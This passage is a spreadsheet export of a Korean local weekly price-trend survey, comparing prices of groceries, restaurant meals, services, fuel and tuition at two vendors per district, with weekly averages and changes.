A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 8,480 | G89: 8,480 | H89: 0 | I89: 농협하나로마트 | J89: 8480 | K89: 8480 | L89: 0 | M89: 홈플러스 | N89: 8480 | O89: 8480 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 2,380 | G90: 2,380 | H90: 0 | I90: 농협하나로마트 | J90: 2380 | K90: 2380 | L90: 0 | M90: 홈플러스 | N90: 2380 | O90: 2380 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 455 | G91: 455 | H91: 0 | I91: 농협하나로마트 | J91: 480 | K91: 480 | L91: 0 | M91: 홈플러스 | N91: 430 | O91: 430 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1,695 | G92: 1,695 | H92: 0 | I92: 농협하나로마트 | J92: 1670 | K92: 1670 | L92: 0 | M92: 홈플러스 | N92: 1720 | O92: 1720 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: 1,345 | G93: 1,345 | H93: 0 | I93: 농협하나로마트 | J93: 1340 | K93: 1340 | L93: 0 | M93: 홈플러스 | N93: 1350 | O93: 1350 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | I94: S-oil 매일주유소 | J94: 0 | K94: 0 | L94: 0 | M94: GS희망찬주유소 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 2 | E95: 2 | F95: 1,504 | G95: 1,504 | H95: 0 | I95: S-oil 매일주유소 | J95: 1529 | K95: 1529 | L95: =K95-J95 -> 0 | M95: GS희망찬주유소 | N95: 1478 | O95: 1478 | P95: 0
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: 1,578 | G96: 1,589 | H96: 11 | I96: S-oil 매일주유소 | J96: 1599 | K96: 1599 | L96: =K96-J96 -> 0 | M96: GS희망찬주유소 | N96: 1557 | O96: 1578 | P96: 21
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: 150,000 | G97: 150,000 | H97: 0 | I97: 클라라피아노 | J97: 150000 | K97: 150000 | L97: =K97-J97 -> 0 | M97: 바하의 아이들 | N97: 150000 | O97: 150000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 2 | E98: 2 | F98: 155,000 | G98: 155,000 | H98: =G98-F98 -> 0 | I98: 파란미술학원 | J98: 150000 | K98: 150000 | L98: =K98-J98 -> 0 | M98: 꿈나무미술학원 | N98: 160000 | O98: 160000 | P98: 0

Sheet 중마동2
A2: 주 간 물 가 동 향(중마동2)
M3: 조사자 : 김성주
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(와이마트) | M4: 조 사 2 지 역(중마시장)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미20 (kg) | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 59900 | G7: 59900 | H7: =G7-F7 -> 0 | I7: 와이마트 | J7: 59800 | K7: 59800 | L7: =K7-J7 -> 0 | M7: 중마시장 | N7: 60,000 | O7: 60,000 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: 2 | E8: 2 | F8: 1350 | G8: 1700 | H8: 350 | I8: 와이마트 | J8: 1200 | K8: 1400 | L8: 200 | M8: 중마시장 | N8: 1,500 | O8: 2,000 | P8: 500
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 5450 | G9: 5200 | H9: -250 | I9: 와이마트 | J9: 7900 | K9: 6400 | L9: -1500 | M9: 중마시장 | N9: 3,000 | O9: 4,000 | P9: 1000
A10: 4 | B10: 양상추 | C10: 상품1개(500g) | D10: 2 | E10: 2 | F10: 3750 | G10: 3500 | H10: -250 | I10: 와이마트 | J10: 3500 | K10: 3000 | L10: -500 | M10: 중마시장 | N10: 4,000 | O10: 4,000 | P10: 0
A11: 5 | B11: 애호박 | C11: 상품1개(250~300g) | D11: 2 | E11: 2 | F11: 3350 | G11: 3350 | H11: 0 | I11: 와이마트 | J11: 3700 | K11: 3700 | L11: 0 | M11: 중마시장 | N11: 3,000 | O11: 3,000 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 1 | E12: 1 | F12: 17000 | G12: 16000 | H12: -1000 | I12: 와이마트 | J12: 0 | K12: 0 | L12: 0 | M12: 중마시장 | N12: 14,000 | O12: 16,000 | P12: 2000
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 2 | E13: 2 | F13: 2990 | G13: 2990 | H13: 0 | I13: 와이마트 | J13: 2980 | K13: 2980 | L13: 0 | M13: 중마시장 | N13: 3,000 | O13: 3,000 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: 2 | F14: 5250 | G14: 5700 | H14: 450 | I14: 와이마트 | J14: 4500 | K14: 5400 | L14: 900 | M14: 중마시장 | N14: 6,000 | O14: 6,000 | P14: 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 18500 | G15: 18500 | H15: 0 | I15: 와이마트 | J15: 19000 | K15: 19000 | L15: 0 | M15: 중마시장 | N15: 18,000 | O15: 18,000 | P15: 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 8900 | G16: 8900 | H16: 0 | I16: 와이마트 | J16: 9800 | K16: 9800 | L16: 0 | M16: 중마시장 | N16: 8,000 | O16: 8,000 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 3000 | G17: 3740 | H17: 740 | I17: 와이마트 | J17: 3500 | K17: 3480 | L17: -20 | M17: 중마시장 | N17: 2,500 | O17: 4,000 | P17: 1500
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 3450 | G18: 3750 | H18: 300 | I18: 와이마트 | J18: 3900 | K18: 4500 | L18: 600 | M18: 중마시장 | N18: 3,000 | O18: 3,000 | P18: 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 1650 | G19: 1650 | H19: 0 | I19: 와이마트 | J19: 2300 | K19: 2300 | L19: 0 | M19: 중마시장 | N19: 1,000 | O19: 1,000 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 4000 | G20: 4150 | H20: 150 | I20: 와이마트 | J20: 4500 | K20: 4900 | L20: 400 | M20: 중마시장 | N20: 3,500 | O20: 3,400 | P20: -100
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 2 | E21: 2 | F21: 4000 | G21: 4000 | H21: 0 | I21: 와이마트 | J21: 4000 | K21: 4000 | L21: 0 | M21: 중마시장 | N21: 4,000 | O21: 4,000 | P21: 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 3745 | G22: 3750 | H22: 5 | I22: 와이마트 | J22: 3490 | K22: 3500 | L22: 10 | M22: 중마시장 | N22: 4,000 | O22: 4,000 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 73200 | G23: 67200 | H23: -6000 | I23: 와이마트 | J23: 87000 | K23: 87000 | L23: 0 | M23: 롯데슈퍼 | N23: 59,400 | O23: 47,400 | P23: -12000
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 0 | E24: 0 | F24: 0 | G24: 0 | H24: 0 | I24: 와이마트 | J24: 0 | K24: 0 | L24: 0 | M24: 롯데슈퍼 | N24: 0 | O24: 0 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 2 | E25: 2 | F25: 12810 | G25: 12240 | H25: -570 | I25: 와이마트 | J25: 13080 | K25: 11940 | L25: -1140 | M25: 롯데슈퍼 | N25: 12,540 | O25: 12,540 | P25: 0
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: =IF(D26=0,0,SUM(J26,N26)/D26) -> 7950 | G26: =IF(E26=0,0,SUM(K26,O26)/E26) -> 7950 | H26: 0 | I26: 와이마트 | J26: 6900 | K26: 6900 | L26: 0 | M26: 중마시장 | N26: 9,000 | O26: 9,000 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: =IF(D27=0,0,SUM(J27,N27)/D27) -> 8475 | G27: 8475 | H27: 0 | I27: 와이마트 | J27: 7950 | K27: 7950 | L27: 0 | M27: 중마시장 | N27: 9,000 | O27: 9,000 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 2 | E28: 2 | F28: 1405 | G28: 1405 | H28: 0 | I28: 와이마트 | J28: 1150 | K28: 1150 | L28: 0 | M28: 중마시장 | N28: 1,660 | O28: 1,660 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 2 | E29: 2 | F29: 15250 | G29: 19250 | H29: 4000 | I29: 와이마트 | J29: 13500 | K29: 13500 | L29: 0 | M29: 중마시장 | N29: 20,000 | O29: 25,000 | P29: 5000
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 4450 | G30: 4950 | H30: 500 | I30: 와이마트 | J30: 4900 | K30: 4900 | L30: 0 | M30: 중마시장 | N30: 4,000 | O30: 5,000 | P30: 1000
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 2 | E31: 2 | F31: 4600 | G31: 4600 | H31: 0 | I31: 와이마트 | J31: 5800 | K31: 5800 | L31: 0 | M31: 중마시장 | N31: 3,400 | O31: 3,400 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 6885 | G32: 6405 | H32: -480 | I32: 와이마트 | J32: 6770 | K32: 5810 | L32: -960 | M32: 중마시장 | N32: 7,000 | O32: 7,000 | P32: 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 2 | E33: 2 | F33: 11900 | G33: 11850 | H33: -50 | I33: 와이마트 | J33: 14800 | K33: 14800 | L33: 0 | M33: 중마시장 | N33: 7000 | O33: 8900 | P33: 1900
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: 2 | E34: 2 | F34: 81250 | G34: 89750 | H34: 8500 | I34: 와이마트 | J34: 89500 | K34: 89500 | L34: 0 | M34: 중마시장 | N34: 90000 | O34: 90000 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 11000 | G36: 11000 | H36: =G36-F36 -> 0 | I36: 큰집설렁탕 | J36: 10000 | K36: 10000 | L36: =K36-J36 -> 0 | M36: 종가집설렁탕 | N36: 12000 | O36: 12000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: 2 | E37: 2 | F37: 10500 | G37: 10500 | H37: 0 | I37: 황초갈비냉면 | J37: 10000 | K37: 10000 | L37: 0 | M37: 진주황포냉면 | N37: 11000 | O37: 11000 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 8250 | G38: 8250 | H38: 0 | I38: 김밥천국 | J38: 7500 | K38: 7500 | L38: 0 | M38: 광양정 | N38: 9000 | O38: 9000 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 14500 | G39: 14500 | H39: 0 | I39: 백운목장 | J39: 14000 | K39: 14000 | L39: 0 | M39: 바우네나주곰탕 | N39: 15000 | O39: 15000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 15500 | G40: 15500 | H40: 0 | I40: 지호삼계탕 | J40: 17000 | K40: 17000 | L40: 0 | M40: 대복삼계탕 | N40: 14000 | O40: 14000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8000 | G41: 8000 | H41: 0 | I41: 덕이네식당 | J41: 8000 | K41: 8000 | L41: 0 | M41: 맛사랑 | N41: 8000 | O41: 8000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 8000 | G42: 8000 | H42: 0 | I42: 판문점 | J42: 8000 | K42: 8000 | L42: 0 | M42: 맛사랑 | N42: 8000 | O42: 8000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 23500 | G43: 23500 | H43: 0 | I43: 금정 | J43: 24000 | K43: 24000 | L43: 0 | M43: 백운목장 | N43: 23000 | O43: 23000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 40000 | G44: 40000 | H44: 0 | I44: 한마음회관 | J44: 40000 | K44: 40000 | L44: 0 | M44: 한마당생고기 | N44: 40000 | O44: 40000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 2 | E45: 2 | F45: 17500 | G45: 17500 | H45: 0 | I45: 광양초밥 | J45: 19000 | K45: 19000 | L45: 0 | M45: 대길초밥 | N45: 16000 | O45: 16000 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 20000 | G46: 20000 | H46: 0 | I46: 멕시카나 | J46: 19000 | K46: 19000 | L46: 0 | M46: BHC | N46: 21000 | O46: 21000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 8000 | G47: 8000 | H47: 0 | I47: 밀밭해물칼국수 | J47: 8000 | K47: 8000 | L47: 0 | M47: 정인정칼국수 | N47: 8000 | O47: 8000 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 4500 | G48: 4500 | H48: 0 | I48: 김밥나라중동무등점 | J48: 4000 | K48: 4000 | L48: 0 | M48: 김가네 | N48: 5000 | O48: 5000 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3750 | G49: 3750 | H49: 0 | I49: 김밥나라중동무등점 | J49: 3500 | K49: 3500 | L49: 0 | M49: 김가네 | N49: 4000 | O49: 4000 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 5450 | G50: 5450 | H50: 0 | I50: 봄차이나 | J50: 5900 | K50: 5900 | L50: 0 | M50: 시장중화요리 | N50: 5000 | O50: 5000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 6950 | G51: 6950 | H51: 0 | I51: 봄차이나 | J51: 6900 | K51: 6900 | L51: 0 | M51: 시장중화요리 | N51: 7000 | O51: 7000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 19000 | G52: 19000 | H52: 0 | I52: 봄차이나 | J52: 21000 | K52: 21000 | L52: 0 | M52: 시장중화요리 | N52: 17000 | O52: 17000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 7950 | G53: 7950 | H53: 0 | I53: 돈비가 | J53: 7900 | K53: 7900 | L53: 0 | M53: 용우동 | N53: 8000 | O53: 8000 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 3900 | G54: 3900 | H54: 0 | I54: 뉴욕버거 | J54: 3900 | K54: 3900 | L54: 0 | M54: 맘스터치 | N54: 3900 | O54: 3900 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 2 | E55: 2 | F55: 18200 | G55: 18200 | H55: 0 | I55: 피자마루 | J55: 16500 | K55: 16500 | L55: 0 | M55: 청년피자 | N55: 19900 | O55: 19900 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3850 | G56: 3850 | H56: 0 | I56: 이디아커피 | J56: 3200 | K56: 3200 | L56: 0 | M56: 엔젤인어스 | N56: 4500 | O56: 4500 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 1 | E57: 1 | F57: 3200 | G57: 3200 | H57: 0 | I57: 이디아커피 | J57: 3200 | K57: 3200 | L57: 0 | M57: 엔젤인어스 | N57: 0 | O57: 0 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 15716.5 | G58: 15716.5 | H58: 0 | I58: 한마당생고기 | J58: 14100 | K58: 14100 | L58: 0 | M58: 한마음회관 | N58: 17333 | O58: 17333 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 11500 | G59: 11500 | H59: 0 | I59: 판문점 | J59: 10000 | K59: 10000 | L59: 0 | M59: 한마음회관 | N59: 13000 | O59: 13000 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 0 | E60: 0 | F60: 0 | G60: 0 | H60: 0 | J60: 0 | K60: 0 | L60: 0 | N60: 0 | O60: 0 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 3750 | G61: 3750 | H61: 0 | I61: 투다리 | J61: 4000 | K61: 4000 | L61: 0 | M61: 까투리 | N61: 3500 | O61: 3500 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 71130 | G62: 71130 | H62: 0 | I62: 주공2차아파트 | J62: 69460 | K62: 69460 | L62: 0 | M62: 선우아파트 | N62: 72800 | O62: 72800 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 9000 | G63: 9000 | H63: 0 | I63: 모아모아빨래방 | J63: 5000 | K63: 5000 | L63: 0 | M63: 드라이하우스 | N63: 13000 | O63: 13000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 4500 | G64: 4500 | H64: 0 | I64: 모아모아빨래방 | J64: 4000 | K64: 4000 | L64: 0 | M64: 드라이하우스 | N64: 5000 | O64: 5000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 0 | E65: 0 | F65: 0 | G65: 0 | H65: 0 | J65: 0 | K65: 0 | L65: 0 | N65: 0 | O65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 0 | E66: 0 | F66: 0 | G66: 0 | H66: 0 | J66: 0 | K66: 0 | L66: 0 | N66: 0 | O66: 0 | P66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: 0 | G67: 0 | H67: 0 | I67: 커뮤니티센터 | J67: 0 | K67: 0 | L67: 0 | N67: 0 | O67: 0 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 2 | E68: 2 | F68: 4000 | G68: 4000 | H68: 0 | I68: 가야볼링장 | J68: 4000 | K68: 4000 | L68: 0 | N68: 4000 | O68: 4000 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 225000 | G69: 225000 | H69: 0 | I69: 제이골프아카데미 | J69: 250000 | K69: 250000 | L69: 0 | M69: 체인지골프아카데미 | N69: 200000 | O69: 200000 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 2 | E70: 2 | F70: 20000 | G70: 20000 | H70: 0 | I70: 솔로몬노래연습장 | J70: 20000 | K70: 20000 | L70: 0 | M70: 좋아좋아노래연습장 | N70: 20000 | O70: 20000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10000 | G71: 10000 | H71: 0 | I71: 진당구클럽 | J71: 10000 | K71: 10000 | L71: 0 | M71: 발섬당구장 | N71: 10000 | O71: 10000 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 19000 | G72: 19000 | H72: 0 | I72: 명진포토샵 | J72: 18000 | K72: 18000 | L72: 0 | M72: 코코포토 | N72: 20000 | O72: 20000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 400 | G73: 400 | H73: 0 | I73: 명진포토샵 | J73: 300 | K73: 300 | L73: 0 | M73: 코코포토 | N73: 500 | O73: 500 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | J74: 0 | K74: 0 | L74: 0 | N74: 0 | O74: 0 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 2 | E75: 2 | F75: 12500 | G75: 12500 | H75: 0 | I75: 커트맨 | J75: 10000 | K75: 10000 | L75: 0 | M75: 중앙이용원 | N75: 15000 | O75: 15000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 32500 | G76: 32500 | H76: 0 | I76: 한가을헤어샵 | J76: 35000 | K76: 35000 | L76: 0 | M76: 아이리스헤어 | N76: 30000 | O76: 30000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 1 | E77: 1 | F77: 8000 | G77: 8000 | H77: 0 | I77: 백운사우나 | J77: 8000 | K77: 8000 | L77: 0 | N77: 0 | O77: 0 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 0 | E78: 0 | F78: 0 | G78: 0 | H78: 0 | J78: 0 | K78: 0 | L78: 0 | N78: 0 | O78: 0 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 2 | E79: 2 | F79: 40000 | G79: 40000 | H79: 0 | I79: 리베라모텔 | J79: 40000 | K79: 40000 | L79: 0 | M79: 유토피아모텔 | N79: 40000 | O79: 40000 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | F80: 0 | G80: 0 | H80: 0 | J80: 0 | K80: 0 | L80: 0 | N80: 0 | O80: 0 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 2 | E81: 2 | F81: 1000 | G81: 1000 | H81: 0 | I81: PC토랑 | J81: 1000 | K81: 1000 | L81: 0 | M81: 3POP피시방 | N81: 1000 | O81: 1000 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 2 | E82: 2 | F82: 6750 | G82: 6750 | H82: 0 | I82: 경동택배 | J82: 6500 | K82: 6500 | L82: 0 | M82: 한진택배 | N82: 7000 | O82: 7000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 0 | E83: 0 | F83: 0 | G83: 0 | H83: 0 | J83: 0 | K83: 0 | L83: 0 | N83: 0 | O83: 0 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 0 | F84: 0 | G84: 0 | H84: 0 | J84: 0 | K84: 0 | L84: 0 | N84: 0 | O84: 0 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 6335 | G86: 6335 | H86: =G86-F86 -> 0 | I86: 와이마트 | J86: 6,250 | K86: 6,250 | L86: =K86-J86 -> 0 | M86: 롯데슈퍼 | N86: 6420 | O86: 6420 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 1425 | G87: 1425 | H87: 0 | I87: 와이마트 | J87: 1,400 | K87: 1,400 | L87: 0 | M87: 롯데슈퍼 | N87: 1450 | O87: 1450 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1175 | G88: 1175 | H88: 0 | I88: 와이마트 | J88: 1,200 | K88: 1,200 | L88: 0 | M88: 롯데슈퍼 | N88: 1150 | O88: 1150 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 8950 | G89: 7575 | H89: -1375 | I89: 와이마트 | J89: 8,550 | K89: 5,800 | L89: -2750 | M89: 롯데슈퍼 | N89: 9350 | O89: 9350 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 3120 | G90: 3120 | H90: 0 | I90: 와이마트 | J90: 3,450 | K90: 3,450 | L90: 0 | M90: 롯데슈퍼 | N90: 2790 | O90: 2790 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 575 | G91: 575 | H91: 0 | I91: 와이마트 | J91: 550 | K91: 550 | L91: 0 | M91: 롯데슈퍼 | N91: 600 | O91: 600 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1820 | G92: 1860 | H92: 40 | I92: 와이마트 | J92: 1,890 | K92: 1,890 | L92: 0 | M92: 롯데슈퍼 | N92: 1830 | O92: 1830 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: =IF(D93=0,0,SUM(J93,N93)/D93) -> 1540 | G93: =IF(E93=0,0,SUM(K93,O93)/E93) -> 1540 | H93: 0 | I93: 와이마트 | J93: 1,490 | K93: 1,490 | L93: 0 | M93: 롯데슈퍼 | N93: 1590 | O93: 1590 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | I94: SK고향주유소 | J94: 0 | K94: 0 | L94: 0 | M94: GS태양점 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 2 | E95: 2 | F95: =IF(D95=0,0,SUM(J95,N95)/D95) -> 1488 | G95: 1488 | H95: 0 | I95: SK고향주유소 | J95: 1498 | K95: 1498 | L95: 0 | M95: GS태양점 | N95: 1,478 | O95: 1,478 | P95: 0
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: =IF(D96=0,0,SUM(J96,N96)/D96) -> 1557.5 | G96: 1578 | H96: 20.5 | I96: SK고향주유소 | J96: 1558 | K96: 1578 | L96: 20 | M96: GS태양점 | N96: 1,557 | O96: 1,578 | P96: 21
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: =IF(D97=0,0,SUM(J97,N97)/D97) -> 150000 | G97: 150000 | H97: 0 | I97: 피앤플음악학원 | J97: 150000 | K97: 150000 | L97: 0 | M97: 음사랑음악학원 | N97: 150,000 | O97: 150,000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 2 | E98: 2 | F98: =IF(D98=0,0,SUM(J98,N98)/D98) -> 150000 | G98: 150000 | H98: 0 | I98: 하늘담은미술 | J98: 140000 | K98: 140000 | L98: 0 | M98: 예초미술학원 | N98: 160,000 | O98: 160,000 | P98: 0

Sheet 광영동
A2: 주 간 물 가 동 향(광영동) 조사자:진옥윤
M3: 조사자 : 진옥윤
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역 (광영농협) | M4: 조 사 2 지 역 (광영시장)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(26개 품목)
